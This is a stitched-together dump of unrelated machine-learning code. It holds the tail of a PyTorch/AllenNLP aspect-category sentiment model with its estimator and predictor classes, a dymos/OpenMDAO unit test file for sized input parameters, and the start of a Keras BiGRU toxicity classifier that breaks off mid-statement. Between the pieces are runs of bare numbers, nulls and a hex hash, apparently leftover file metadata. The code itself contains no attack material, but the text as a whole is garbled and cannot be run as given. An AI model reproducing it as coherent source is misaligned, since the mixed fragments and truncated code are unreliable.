lstm_layer_words_sentiment_soft.append(torch.softmax(words_sentiment, dim=-1)) sentiment_output_mil = torch.matmul(sentiment_alpha, words_sentiment_soft).squeeze(1) # batch_size x 2*hidden_dim if self.configuration['concat_cls_vector']: if self.configuration['mil_softmax']: sentiment_output_cls_softmax = torch.softmax(sentiment_output_cls, dim=-1) sentiment_output = sentiment_output_mil + sentiment_output_cls_softmax else: sentiment_output = sentiment_output_mil + sentiment_output_cls else: sentiment_output = sentiment_output_mil lstm_layer_sentiment_outputs.append(sentiment_output) else: sentiment_output_temp = self.element_wise_mul(word_representation_for_sentiment, sentiment_alpha, return_not_sum_result=False) sentiment_output_not_mil = self.sentiment_fc(sentiment_output_temp) if self.configuration['concat_cls_vector']: sentiment_output = sentiment_output_not_mil + sentiment_output_cls else: sentiment_output = sentiment_output_not_mil lstm_layer_sentiment_outputs.append(sentiment_output) final_category_outputs = [] final_lstm_category_outputs = [] final_sentiment_outputs = [] for i in range(self.category_num): fc = self.category_fcs[i] category_output = embedding_layer_category_outputs[i] final_category_output = fc(category_output) final_category_outputs.append(final_category_output) sentiment_output = lstm_layer_sentiment_outputs[i] final_sentiment_output = sentiment_output final_sentiment_outputs.append(final_sentiment_output) output = {} if label is not None: category_labels = [] polarity_labels = [] polarity_masks = [] for i in range(self.category_num): category_labels.append(label[:, i]) polarity_labels.append(label[:, i + self.category_num]) polarity_masks.append(polarity_mask[:, i]) loss = 0 total_category_loss = 0 total_sentiment_loss = 0 for i in range(self.category_num): category_temp_loss = self.category_loss(final_category_outputs[i].squeeze(dim=-1), category_labels[i]) sentiment_temp_loss = self.sentiment_loss(final_sentiment_outputs[i], polarity_labels[i].long()) total_category_loss += category_temp_loss if not self.configuration['only_acd']: total_sentiment_loss += sentiment_temp_loss loss = self.category_loss_weight * total_category_loss + self.sentiment_loss_weight * total_sentiment_loss # sentiment accuracy sentiment_logit = torch.cat(final_sentiment_outputs) sentiment_label = torch.cat(polarity_labels) sentiment_mask = torch.cat(polarity_masks) self._accuracy(sentiment_logit, sentiment_label, sentiment_mask) # category f1 final_category_outputs_prob = [torch.sigmoid(e) for e in final_category_outputs] category_prob = torch.cat(final_category_outputs_prob).squeeze() category_label = torch.cat(category_labels) self._f1(category_prob, category_label) output['loss'] = loss # visualize attention pred_category = [torch.sigmoid(e) for e in final_category_outputs] pred_sentiment = [torch.nn.functional.softmax(e, dim=-1) for e in final_sentiment_outputs] output['pred_category'] = pred_category output['pred_sentiment'] = pred_sentiment if self.configuration['visualize_attention']: for i in range(len(sample)): words = sample[i][2] attention_labels = [e.split('/')[0] for e in self.categories] # category visual_attentions_category = [embedding_layer_category_alphas[j][i][: len(words)].detach().cpu().numpy() for j in range(self.category_num)] titles = ['true: %s - pred: %s' % (str(label[i][j].detach().cpu().numpy()), str(pred_category[j][i].detach().cpu().numpy())) for j in range(self.category_num)] savefig_filepath = super()._get_model_visualization_picture_filepath(self.configuration, words) attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions_category, attention_labels, titles, savefig_filepath) # sentiment lstm layer visual_attentions_sentiment_temp = [lstm_layer_words_sentiment_soft[j][i][: len(words)].detach().cpu().numpy() for j in range(self.category_num)] for j in range(self.category_num): c_label = label[i][j].detach().cpu().numpy().tolist() if c_label == 1: visual_attentions_sentiment = [] labels_sentiment = [] sentiment_true_index = int(label[i][j + self.category_num].detach().cpu().numpy().tolist()) if sentiment_true_index == -100: continue titles_sentiment = ['true: %s - pred: %s - %s' % (str(self.polarites[sentiment_true_index]), str(pred_sentiment[j][i].detach().cpu().numpy()), str(self.polarites))] c_attention = embedding_layer_category_alphas[j][i][: len(words)].detach().cpu().numpy() visual_attentions_sentiment.append(c_attention) labels_sentiment.append(self.categories[j].split('/')[0]) s_distributions = visual_attentions_sentiment_temp[j] for k in range(self.polarity_num): labels_sentiment.append(self.polarites[k]) visual_attentions_sentiment.append(s_distributions[:, k]) titles_sentiment.extend([''] * 3) savefig_filepath = super()._get_model_visualization_picture_filepath(self.configuration, words) attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions_sentiment, labels_sentiment, titles_sentiment, savefig_filepath) return output def get_metrics(self, reset: bool = False) -> Dict[str, float]: metrics = { 'accuracy': self._accuracy.get_metric(reset), 'category_f1': self._f1.get_metric(reset)['fscore'] } return metrics class Estimator: def estimate(self, ds: Iterable[Instance]) -> dict: raise NotImplementedError('estimate') class TextInAllAspectSentimentOutEstimator(Estimator): def __init__(self, model: Model, iterator: DataIterator, categories: list, polarities: list, cuda_device: int = -1, configuration: dict=None) -> None: super().__init__() self.model = model self.iterator = iterator self.categories = categories self.polarities = polarities self._sentiment_accuracy = metrics.CategoricalAccuracy() self._sentiment_accuracy_temp = metrics.CategoricalAccuracy() self._aspect_f1 = allennlp_metrics.BinaryF1(0.5) self._aspect_f1_temp = allennlp_metrics.BinaryF1(0.5) self.cuda_device = cuda_device self.configuration = configuration self.other_metrics = {} self.debug = False def _get_other_metrics(self, reset=True): result = self.other_metrics if reset: self.other_metrics = {} return result def _print_tensor(self, tensors: List): print('------------------------------------------------------') list_list = [e.detach().cpu().numpy().tolist() if not isinstance(e, np.ndarray) else e.tolist() for e in tensors] for k in range(len(list_list[0])): format_str = '-'.join(['%s'] * len(list_list)) values = tuple(e[k] for e in list_list) print(format_str % values) def _acd_aspect_and_metrics(self, category_labels, aspect_pred): acd_aspect_and_metrics = {} for i, aspect in enumerate(self.categories): aspect_label_i = category_labels[i].detach().cpu().numpy().astype(int) aspect_pred_i = (aspect_pred[i].squeeze(dim=-1).detach().cpu().numpy() > 0.5).astype(int) if self.debug: self._print_tensor([aspect_pred_i, aspect_label_i]) aspect_f1 = f1_score(aspect_label_i, aspect_pred_i, average='binary') aspect_precision = precision_score(aspect_label_i, aspect_pred_i, average='binary') aspect_recall = recall_score(aspect_label_i, aspect_pred_i, average='binary') acd_aspect_and_metrics[aspect] = { 'f1': aspect_f1, 'precision': aspect_precision, 'recall': aspect_recall } return acd_aspect_and_metrics def _acsc_aspect_and_metrics(self, polarity_labels, sentiment_pred, polarity_masks): acsc_aspect_and_metrics = {} for i, aspect in enumerate(self.categories): aspect_sentiment_label_i = polarity_labels[i] aspect_sentiment_pred_i = sentiment_pred[i] aspect_sentiment_mask_i = polarity_masks[i] self._sentiment_accuracy_temp(aspect_sentiment_pred_i, aspect_sentiment_label_i, aspect_sentiment_mask_i) aspect_acc_temp = self._sentiment_accuracy_temp.get_metric(reset=True), acsc_aspect_and_metrics[aspect] = { 'acc': aspect_acc_temp[0], } return acsc_aspect_and_metrics def _polarity_metrics(self, sentiment_logit, sentiment_label, sentiment_mask): sentiment_label_pred_list = sentiment_logit.argmax(dim=-1).detach().cpu().numpy().tolist() sentiment_label_list = sentiment_label.detach().cpu().numpy().tolist() sentiment_mask_list = sentiment_mask.detach().cpu().numpy().tolist() sentiment_label_pred_final = [] sentiment_label_final = [] for i in range(len(sentiment_mask_list)): sentiment_label_list_i = sentiment_label_list[i] sentiment_label_pred_list_i = sentiment_label_pred_list[i] sentiment_mask_list_i = sentiment_mask_list[i] if sentiment_mask_list_i == 0: continue sentiment_label_pred_final.append(sentiment_label_pred_list_i) sentiment_label_final.append(sentiment_label_list_i) sentiment_f1s = f1_score(np.array(sentiment_label_final), np.array(sentiment_label_pred_final), average=None, labels=list(range(len(self.polarities)))) sentiment_precisions = precision_score(np.array(sentiment_label_final), np.array(sentiment_label_pred_final), average=None, labels=list(range(len(self.polarities)))) sentiment_recalls = recall_score(np.array(sentiment_label_final), np.array(sentiment_label_pred_final), average=None, labels=list(range(len(self.polarities)))) polarity_metrics = {} for i, polarity in enumerate(self.polarities): polarity_metrics[polarity] = { 'f1': sentiment_f1s[i], 'precision': sentiment_precisions[i], 'recall': sentiment_recalls[i] } return polarity_metrics def _merge_micro_f1(self, merge_label_real, merge_logit_real): tp = 0 pred_total = 0 true_total = 0 for i in range(merge_logit_real.shape[0]): pred = merge_logit_real[i] true = merge_label_real[i] if pred != 0: pred_total += 1 if true != 0: true_total += 1 if pred == true != 0: tp += 1 if pred_total == 0: pred_total = 0.0000000000000001 if true_total == 0: true_total = 0.0000000000000001 p = tp / pred_total r = tp / true_total if p == 0 and r == 0: f1 = 0 else: f1 = 2 * (p * r) / (p + r) return f1 def _inner_estimate(self, label, polarity_mask, aspect_pred, sentiment_pred, merge_pred): category_labels = [] polarity_labels = [] merge_labeles = [] polarity_masks = [] category_num = len(self.categories) for i in range(category_num): category_labels.append(label[:, i]) polarity_labels.append(label[:, i + category_num]) polarity_masks.append(polarity_mask[:, i]) merge_labeles.append(label[:, i + category_num * 2]) if self.debug: self._print_tensor([label] + category_labels + polarity_labels + merge_labeles) self._print_tensor([polarity_mask] + polarity_masks) acd_aspect_and_metrics = self._acd_aspect_and_metrics(category_labels, aspect_pred) self.other_metrics['acd_metrics'] = acd_aspect_and_metrics # category f1 category_prob = torch.cat(aspect_pred).squeeze() category_label = torch.cat(category_labels) self._aspect_f1(category_prob, category_label) if not self.configuration['only_acd']: acsc_aspect_and_metrics = self._acsc_aspect_and_metrics(polarity_labels, sentiment_pred, polarity_masks) self.other_metrics['acsc_metrics'] = acsc_aspect_and_metrics # sentiment accuracy sentiment_logit = torch.cat(sentiment_pred) sentiment_label = torch.cat(polarity_labels) sentiment_mask = torch.cat(polarity_masks) self._sentiment_accuracy(sentiment_logit, sentiment_label, sentiment_mask) polarity_metrics = self._polarity_metrics(sentiment_logit, sentiment_label, sentiment_mask) self.other_metrics['polarity_metrics'] = polarity_metrics # merge merge_logit = torch.cat(merge_pred) merge_pred_aspect_indicator = (merge_logit.argmax(dim=-1) != 0) merge_pred_aspect_indicator = nn_util.move_to_device(merge_pred_aspect_indicator, self.cuda_device) merge_label = torch.cat(merge_labeles) merge_label_aspect_indicator = (merge_label != 0) merge_label_aspect_indicator = nn_util.move_to_device(merge_label_aspect_indicator, self.cuda_device) merge_aspect_indicator = merge_pred_aspect_indicator | merge_label_aspect_indicator if self.debug: self._print_tensor([merge_logit, merge_pred_aspect_indicator, merge_label, merge_label_aspect_indicator, merge_aspect_indicator]) merge_logit_real = merge_logit[merge_aspect_indicator].argmax(dim=-1).detach().cpu().numpy() merge_label_real = merge_label[merge_aspect_indicator].detach().cpu().numpy() if self.debug: self._print_tensor([merge_logit_real, merge_label_real]) # merge_micro_f1 = f1_score(merge_label_real, merge_logit_real, average='micro') merge_micro_f1 = self._merge_micro_f1(merge_label_real, merge_logit_real) self.other_metrics['merge_micro_f1'] = merge_micro_f1 def estimate(self, ds: Iterable[Instance]) -> dict: self.model.eval() pred_generator = self.iterator(ds, num_epochs=1, shuffle=False) pred_generator_tqdm = tqdm(pred_generator, total=self.iterator.get_num_batches(ds)) with torch.no_grad(): labels = [] polarity_masks = [] pred_categorys = [] pred_sentiments = [] pred_merges = [] for batch in pred_generator_tqdm: label = batch['label'] labels.append(label) polarity_mask = batch['polarity_mask'] polarity_masks.append(polarity_mask) batch = nn_util.move_to_device(batch, self.cuda_device) out_dict = self.model(**batch) pred_category = out_dict['pred_category'] pred_categorys.append(pred_category) if not self.configuration['only_acd']: pred_sentiment = out_dict['pred_sentiment'] pred_sentiments.append(pred_sentiment) if 'merge_pred' in out_dict: pred_merge = out_dict['merge_pred'] else: pred_merge = [] for i in range(len(self.categories)): pred_category_i = pred_category[i].detach().clone().squeeze(-1) pred_sentiment_i = torch.softmax(pred_sentiment[i], dim=-1) aspect_threshold = 0.5 if 'aspect_threshold' not in self.configuration else self.configuration['aspect_threshold'] pred_category_i_indicator = pred_category_i > aspect_threshold pred_category_i_indicator_not = pred_category_i <= aspect_threshold if self.debug: print(i) self._print_tensor([pred_category_i, pred_sentiment_i, pred_category_i_indicator, pred_category_i_indicator_not]) pred_category_i[pred_category_i_indicator] = 0 pred_category_i[pred_category_i_indicator_not] = 1.1 pred_category_i = pred_category_i.unsqueeze(-1) if self.debug: self._print_tensor([pred_category[i], pred_category_i, torch.cat([pred_category_i, pred_sentiment_i], dim=-1)]) pred_merge.append(torch.cat([pred_category_i, pred_sentiment_i], dim=-1)) pred_merges.append(pred_merge) label_final = torch.cat(labels, dim=0) polarity_mask_final = torch.cat(polarity_masks, dim=0) pred_category_final = [] pred_sentiment_final = [] pred_merge_final = [] for i in range(len(self.categories)): pred_category_i = [e[i] for e in pred_categorys] pred_category_i_cat = torch.cat(pred_category_i, dim=0) pred_category_final.append(pred_category_i_cat) if not self.configuration['only_acd']: pred_sentiment_i = [e[i] for e in pred_sentiments] pred_sentiment_i_cat = torch.cat(pred_sentiment_i, dim=0) pred_sentiment_final.append(pred_sentiment_i_cat) pred_merge_i = [e[i] for e in pred_merges] pred_merge_i_cat = torch.cat(pred_merge_i, dim=0) pred_merge_final.append(pred_merge_i_cat) # self._estimate(label_final, polarity_mask_final, pred_category_final, pred_sentiment_final) self._inner_estimate(label_final, polarity_mask_final, pred_category_final, pred_sentiment_final, pred_merge_final) return {'sentiment_acc': self._sentiment_accuracy.get_metric(reset=True), 'category_f1': self._aspect_f1.get_metric(reset=True), 'other_metrics': self._get_other_metrics()} class Predictor: def predict(self, ds: Iterable[Instance]) -> dict: raise NotImplementedError('predict') class TextInAllAspectSentimentOutPredictor(Predictor): def __init__(self, model: Model, iterator: DataIterator, categories: list, polarities: list, cuda_device: int = -1, configuration: dict=None) -> None: super().__init__() self.model = model self.iterator = iterator self.categories = categories self.polarities = polarities self.cuda_device = cuda_device self.configuration = configuration self.debug = False def _print_tensor(self, tensors: List): print('------------------------------------------------------') list_list = [e.detach().cpu().numpy().tolist() if not isinstance(e, np.ndarray) else e.tolist() for e in tensors] for k in range(len(list_list[0])): format_str = '-'.join(['%s'] * len(list_list)) values = tuple(e[k] for e in list_list) print(format_str % values) def predict(self, ds: Iterable[Instance]) -> dict: with torch.no_grad(): self.model.eval() pred_generator = self.iterator(ds, num_epochs=1, shuffle=False) pred_generator_tqdm = tqdm(pred_generator, total=self.iterator.get_num_batches(ds)) labels = [] polarity_masks = [] pred_categorys = [] pred_sentiments = [] pred_merges = [] for batch in pred_generator_tqdm: label = batch['label'] labels.append(label) polarity_mask = batch['polarity_mask'] polarity_masks.append(polarity_mask) batch = nn_util.move_to_device(batch, self.cuda_device) out_dict = self.model(**batch) pred_category = out_dict['pred_category'] pred_categorys.append(pred_category) if not self.configuration['only_acd']: pred_sentiment = out_dict['pred_sentiment'] pred_sentiments.append(pred_sentiment) if 'merge_pred' in out_dict: pred_merge = out_dict['merge_pred'] else: pred_merge = [] for i in range(len(self.categories)): pred_category_i = pred_category[i].detach().clone().squeeze(-1) pred_sentiment_i = torch.softmax(pred_sentiment[i], dim=-1) aspect_threshold = 0.5 if 'aspect_threshold' not in self.configuration else self.configuration['aspect_threshold'] pred_category_i_indicator = pred_category_i > aspect_threshold pred_category_i_indicator_not = pred_category_i <= aspect_threshold if self.debug: print(i) self._print_tensor([pred_category_i, pred_sentiment_i, pred_category_i_indicator, pred_category_i_indicator_not]) pred_category_i[pred_category_i_indicator] = 0 pred_category_i[pred_category_i_indicator_not] = 1.1 pred_category_i = pred_category_i.unsqueeze(-1) if self.debug: self._print_tensor([pred_category[i], pred_category_i, torch.cat([pred_category_i, pred_sentiment_i], dim=-1)]) pred_merge.append(torch.cat([pred_category_i, pred_sentiment_i], dim=-1)) pred_merges.append(pred_merge) label_final = torch.cat(labels, dim=0) polarity_mask_final = torch.cat(polarity_masks, dim=0) pred_category_final = [] pred_sentiment_final = [] pred_merge_final = [] for i in range(len(self.categories)): pred_category_i = [e[i] for e in pred_categorys] pred_category_i_cat = torch.cat(pred_category_i, dim=0) pred_category_final.append(pred_category_i_cat) if not self.configuration['only_acd']: pred_sentiment_i = [e[i] for e in pred_sentiments] pred_sentiment_i_cat = torch.cat(pred_sentiment_i, dim=0) pred_sentiment_final.append(pred_sentiment_i_cat) pred_merge_i = [e[i] for e in pred_merges] pred_merge_i_cat = torch.cat(pred_merge_i, dim=0) pred_merge_final.append(pred_merge_i_cat) result = [] for i in range(len(ds)): sample_label = label_final[i][len(self.categories): len(self.categories) + len(self.categories)] sample_predict = [pred_sentiment_final[j][i] for j in range(len(self.categories))] sample_result = [] for j in range(len(self.categories)): if sample_label[j] == -100: continue category = self.categories[j] sentiment_index = sample_predict[j].argmax(dim=-1) sentiment = self.polarities[sentiment_index] sample_result.append((category, sentiment)) result.append(sample_result) return result class TextInAllAspectSentimentOutPredictorOnInstanceLevel(Predictor): def __init__(self, model: Model, iterator: DataIterator, categories: list, polarities: list, cuda_device: int = -1, configuration: dict=None) -> None: super().__init__() self.model = model self.iterator = iterator self.categories = categories self.polarities = polarities self.cuda_device = cuda_device self.configuration = configuration self.debug = False def _print_tensor(self, tensors: List): print('------------------------------------------------------') list_list = [e.detach().cpu().numpy().tolist() if not isinstance(e, np.ndarray) else e.tolist() for e in tensors] for k in range(len(list_list[0])): format_str = '-'.join(['%s'] * len(list_list)) values = tuple(e[k] for e in list_list) print(format_str % values) def predict(self, ds: Iterable[Instance]) -> dict: result = [] with torch.no_grad(): self.model.eval() pred_generator = self.iterator(ds, num_epochs=1, shuffle=False) pred_generator_tqdm = tqdm(pred_generator, total=self.iterator.get_num_batches(ds)) for batch in pred_generator_tqdm: batch = nn_util.move_to_device(batch, self.cuda_device) out_dict = self.model(**batch) attention_weights = out_dict['embedding_layer_category_alphas'] word_sentiments = out_dict['lstm_layer_words_sentiment_soft'] for i in range(word_sentiments[0].shape[0]): attention_weights_of_one_sample = [e[i].detach().cpu().numpy() for e in attention_weights] word_sentiments_of_one_sample = [e[i].detach().cpu().numpy() for e in word_sentiments] result.append({'attention_weights': attention_weights_of_one_sample, 'word_sentiments': word_sentiments_of_one_sample}) return result class TextInAllAspectSentimentOutEstimatorAll(Estimator): def __init__(self, model: Model, iterator: DataIterator, categories: list, polarities: list, cuda_device: int = -1, configuration: dict=None) -> None: super().__init__() self.model = model self.iterator = iterator self.categories = categories self.polarities = polarities self._accuracy = metrics.CategoricalAccuracy() self._f1 = allennlp_metrics.BinaryF1(0.5) self.cuda_device = cuda_device self.configuration = configuration def _estimate(self, batch) -> np.ndarray: label = batch['label'] polarity_mask = batch['polarity_mask'] category_labels = [] polarity_labels = [] polarity_masks = [] for i in range(len(self.categories)): category_labels.append(label[:, i]) polarity_labels.append(label[:, i + len(self.categories)]) polarity_masks.append(polarity_mask[:, i]) out_dict = self.model(**batch) pred_category = out_dict['pred_category'] if not self.configuration['only_acd']: pred_sentiment = out_dict['pred_sentiment'] sentiment_logit = torch.cat(pred_sentiment) sentiment_label = torch.cat(polarity_labels) sentiment_mask = torch.cat(polarity_masks) self._accuracy(sentiment_logit, sentiment_label, sentiment_mask) # category f1 category_prob = torch.cat(pred_category).squeeze() category_label = torch.cat(category_labels) self._f1(category_prob, category_label) def estimate(self, ds: Iterable[Instance]) -> dict: self.model.eval() pred_generator = self.iterator(ds, num_epochs=1, shuffle=False) pred_generator_tqdm = tqdm(pred_generator, total=self.iterator.get_num_batches(ds)) with torch.no_grad(): for batch in pred_generator_tqdm: batch = nn_util.move_to_device(batch, self.cuda_device) self._estimate(batch) return {'sentiment_acc': self._accuracy.get_metric(reset=True), 'category_f1': self._f1.get_metric(reset=True)}
54.241701
191
0.608417
11,400
104,578
5.209737
0.037281
0.029466
0.019953
0.019835
0.877338
0.846728
0.821202
0.803203
0.784075
0.773046
0
0.006729
0.306499
104,578
1,927
192
54.26985
0.812175
0.065932
0
0.766391
0
0
0.030088
0.013525
0
0
0
0
0
1
0.040738
false
0.00191
0.023552
0
0.0993
0.015277
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
c4d4825a3bd9b71b736ce38fed155a48eaf381f4
10,408
py
Python
dymos/phase/test/test_sized_input_parameters.py
mjfwest/dymos
8650bf8087c551fc8a6faf3aa5723c3739b9617e
[ "Apache-2.0" ]
null
null
null
dymos/phase/test/test_sized_input_parameters.py
mjfwest/dymos
8650bf8087c551fc8a6faf3aa5723c3739b9617e
[ "Apache-2.0" ]
null
null
null
dymos/phase/test/test_sized_input_parameters.py
mjfwest/dymos
8650bf8087c551fc8a6faf3aa5723c3739b9617e
[ "Apache-2.0" ]
null
null
null
import unittest import openmdao.api as om from openmdao.utils.assert_utils import assert_near_equal import dymos as dm from dymos.utils.lgl import lgl from dymos.models.eom import FlightPathEOM2D import numpy as np class TestInputParameterConnections(unittest.TestCase): def test_dynamic_input_parameter_connections_radau(self): class TrajectoryODE(om.Group): def initialize(self): self.options.declare('num_nodes', types=int) def setup(self): nn = self.options['num_nodes'] self.add_subsystem('sum', om.ExecComp('m_tot = sum(m)', m={'value': np.zeros((nn, 2, 2)), 'units': 'kg'}, m_tot={'value': np.zeros(nn), 'units': 'kg'})) self.add_subsystem('eom', FlightPathEOM2D(num_nodes=nn)) self.connect('sum.m_tot', 'eom.m') optimizer = 'SLSQP' num_segments = 1 transcription_order = 5 p = om.Problem(model=om.Group()) p.driver = om.pyOptSparseDriver() p.driver.options['optimizer'] = optimizer p.driver.declare_coloring() seg_ends, _ = lgl(num_segments + 1) # @dm.declare_time(units='s') # @dm.declare_state('v', rate_source='eom.v_dot', units='m/s') # @dm.declare_state('h', rate_source='eom.h_dot', units='m') # @dm.declare_parameter('m', targets='sum.m', units='kg', shape=(2, 2)) phase = dm.Phase(ode_class=TrajectoryODE, transcription=dm.Radau(num_segments=num_segments, order=transcription_order, segment_ends=seg_ends)) p.model.add_subsystem('phase0', phase) phase.set_time_options(initial_bounds=(0.0, 100.0), duration_bounds=(0., 100.), units='s') phase.add_state('h', fix_initial=True, fix_final=True, lower=0.0, units='m', rate_source='eom.h_dot') phase.add_state('v', fix_initial=True, fix_final=False, units='m/s', rate_source='eom.v_dot') phase.add_input_parameter('m', val=[[1, 2], [3, 4]], units='kg', targets='sum.m') p.model.linear_solver = om.DirectSolver() p.setup(check=True, force_alloc_complex=True) p['phase0.t_initial'] = 0.0 p['phase0.t_duration'] = 100.0 p['phase0.states:h'] = phase.interpolate(ys=[20, 0], nodes='state_input') p['phase0.states:v'] = phase.interpolate(ys=[0, -5], nodes='state_input') p.run_model() expected = np.broadcast_to(np.array([[1, 2], [3, 4]]), (p.model.phase0.options['transcription'].grid_data.num_nodes, 2, 2)) assert_near_equal(p.get_val('phase0.rhs_all.sum.m'), expected) def test_static_input_parameter_connections_radau(self): class TrajectoryODE(om.Group): def initialize(self): self.options.declare('num_nodes', types=int) def setup(self): nn = self.options['num_nodes'] self.add_subsystem('sum', om.ExecComp('m_tot = sum(m)', m={'value': np.zeros((2, 2)), 'units': 'kg'}, m_tot={'value': np.zeros(nn), 'units': 'kg'})) self.add_subsystem('eom', FlightPathEOM2D(num_nodes=nn)) self.connect('sum.m_tot', 'eom.m') optimizer = 'SLSQP' num_segments = 1 transcription_order = 5 p = om.Problem(model=om.Group()) p.driver = om.pyOptSparseDriver() p.driver.options['optimizer'] = optimizer p.driver.declare_coloring() seg_ends, _ = lgl(num_segments + 1) phase = dm.Phase(ode_class=TrajectoryODE, transcription=dm.Radau(num_segments=num_segments, order=transcription_order, segment_ends=seg_ends)) p.model.add_subsystem('phase0', phase) phase.set_time_options(initial_bounds=(0.0, 100.0), duration_bounds=(0., 100.)) phase.add_state('h', fix_initial=True, fix_final=True, lower=0.0, units='m', rate_source='eom.h_dot') phase.add_state('v', fix_initial=True, fix_final=False, units='m/s', rate_source='eom.v_dot') phase.add_input_parameter('m', val=[[1, 2], [3, 4]], units='kg', targets='sum.m', dynamic=False) p.model.linear_solver = om.DirectSolver() p.setup(check=True, force_alloc_complex=True) p['phase0.t_initial'] = 0.0 p['phase0.t_duration'] = 100.0 p['phase0.states:h'] = phase.interpolate(ys=[20, 0], nodes='state_input') p['phase0.states:v'] = phase.interpolate(ys=[0, -5], nodes='state_input') p.run_model() expected = np.array([[1, 2], [3, 4]]) assert_near_equal(p.get_val('phase0.rhs_all.sum.m'), expected) def test_dynamic_input_parameter_connections_gl(self): class TrajectoryODE(om.Group): def initialize(self): self.options.declare('num_nodes', types=int) def setup(self): nn = self.options['num_nodes'] self.add_subsystem('sum', om.ExecComp('m_tot = sum(m)', m={'value': np.zeros((nn, 2, 2)), 'units': 'kg'}, m_tot={'value': np.zeros(nn), 'units': 'kg'})) self.add_subsystem('eom', FlightPathEOM2D(num_nodes=nn)) self.connect('sum.m_tot', 'eom.m') optimizer = 'SLSQP' num_segments = 1 transcription_order = 5 p = om.Problem(model=om.Group()) p.driver = om.pyOptSparseDriver() p.driver.options['optimizer'] = optimizer p.driver.declare_coloring() seg_ends, _ = lgl(num_segments + 1) phase = dm.Phase(ode_class=TrajectoryODE, transcription=dm.GaussLobatto(num_segments=num_segments, order=transcription_order, segment_ends=seg_ends)) p.model.add_subsystem('phase0', phase) phase.set_time_options(initial_bounds=(0.0, 100.0), duration_bounds=(0., 100.), units='s') phase.add_state('h', fix_initial=True, fix_final=True, lower=0.0, units='m', rate_source='eom.h_dot') phase.add_state('v', fix_initial=True, fix_final=False, units='m/s', rate_source='eom.v_dot') phase.add_input_parameter('m', val=[[1, 2], [3, 4]], units='kg', targets='sum.m') p.model.linear_solver = om.DirectSolver() p.setup(check=True, force_alloc_complex=True) p['phase0.t_initial'] = 0.0 p['phase0.t_duration'] = 100.0 p['phase0.states:h'] = phase.interpolate(ys=[20, 0], nodes='state_input') p['phase0.states:v'] = phase.interpolate(ys=[0, -5], nodes='state_input') p.run_model() gd = p.model.phase0.options['transcription'].grid_data expected = np.broadcast_to(np.array([[1, 2], [3, 4]]), (gd.subset_num_nodes['state_disc'], 2, 2)) assert_near_equal(p.get_val('phase0.rhs_disc.sum.m'), expected) expected = np.broadcast_to(np.array([[1, 2], [3, 4]]), (gd.subset_num_nodes['col'], 2, 2)) assert_near_equal(p.get_val('phase0.rhs_col.sum.m'), expected) def test_static_input_parameter_connections_gl(self): class TrajectoryODE(om.Group): def initialize(self): self.options.declare('num_nodes', types=int) def setup(self): nn = self.options['num_nodes'] self.add_subsystem('sum', om.ExecComp('m_tot = sum(m)', m={'value': np.zeros((2, 2)), 'units': 'kg'}, m_tot={'value': np.zeros(nn), 'units': 'kg'})) self.add_subsystem('eom', FlightPathEOM2D(num_nodes=nn)) self.connect('sum.m_tot', 'eom.m') optimizer = 'SLSQP' num_segments = 1 transcription_order = 5 p = om.Problem(model=om.Group()) p.driver = om.pyOptSparseDriver() p.driver.options['optimizer'] = optimizer p.driver.declare_coloring() seg_ends, _ = lgl(num_segments + 1) phase = dm.Phase(ode_class=TrajectoryODE, transcription=dm.GaussLobatto(num_segments=num_segments, order=transcription_order, segment_ends=seg_ends)) p.model.add_subsystem('phase0', phase) phase.set_time_options(initial_bounds=(0.0, 100.0), duration_bounds=(0., 100.), units='s') phase.add_state('h', fix_initial=True, fix_final=True, lower=0.0, units='m', rate_source='eom.h_dot') phase.add_state('v', fix_initial=True, fix_final=False, units='m/s', rate_source='eom.v_dot') phase.add_input_parameter('m', val=[[1, 2], [3, 4]], units='kg', targets='sum.m', dynamic=False) p.model.linear_solver = om.DirectSolver() p.setup(check=True, force_alloc_complex=True) p['phase0.t_initial'] = 0.0 p['phase0.t_duration'] = 100.0 p['phase0.states:h'] = phase.interpolate(ys=[20, 0], nodes='state_input') p['phase0.states:v'] = phase.interpolate(ys=[0, -5], nodes='state_input') p.run_model() expected = np.array([[1, 2], [3, 4]]) assert_near_equal(p.get_val('phase0.rhs_disc.sum.m'), expected) assert_near_equal(p.get_val('phase0.rhs_col.sum.m'), expected) if __name__ == '__main__': # pragma: no cover unittest.main()
38.405904
109
0.533628
1,250
10,408
4.24
0.1048
0.01434
0.024528
0.006792
0.926038
0.919623
0.91566
0.900566
0.900566
0.896981
0
0.026885
0.324558
10,408
270
110
38.548148
0.727027
0.022483
0
0.877907
0
0
0.100708
0.004131
0
0
0
0
0.040698
1
0.069767
false
0
0.040698
0
0.139535
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
f2042ecf7c552015698c774d9d94760751ea54d4
4,249
py
Python
models/ht_models/bigru.py
NLashkarashvili/Toxicity_Detection_in_Georgian_Discussions
d5a639c866d33258e91bc401b087b9fba969384e
[ "MIT" ]
1
2022-03-13T16:59:37.000Z
2022-03-13T16:59:37.000Z
models/ht_models/bigru.py
NLashkarashvili/Toxicity_Detection_in_Georgian_Discussions
d5a639c866d33258e91bc401b087b9fba969384e
[ "MIT" ]
null
null
null
models/ht_models/bigru.py
NLashkarashvili/Toxicity_Detection_in_Georgian_Discussions
d5a639c866d33258e91bc401b087b9fba969384e
[ "MIT" ]
null
null
null
import tensorflow as tf import scipy.stats as stats from kerashypetune import KerasRandomSearch from gensim import models from tensorflow import keras from tensorflow.keras import layers from sklearn.metrics import roc_auc_score from sklearn.model_selection import train_test_split from tensorflow.keras.layers.experimental.preprocessing import TextVectorization ##model for FastText pretrained embeddings (embed_dim set to 300) def get_model(param, maxlen=25, vocab_size=vocab_size, embed_dim=300): inputs = layers.Input(shape=(maxlen,)) embedding_layer = layers.Embedding(input_dim = vocab_size, output_dim=embed_dim, input_length=maxlen) x = embedding_layer(inputs) x = layers.Bidirectional(layers.GRU(param['unit_1'], input_dim=(None, embed_dim), return_sequences=False, activation='tanh', dropout=param['dropout']))(x) outputs = layers.Dense(1, activation="sigmoid")(x) model = keras.Model(inputs=inputs, outputs=outputs) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=param['lr']), loss="binary_crossentropy", metrics=["accuracy", tf.keras.metrics.AUC(name='auc')]) return model from sklearn.model_selection import StratifiedShuffleSplit sss = 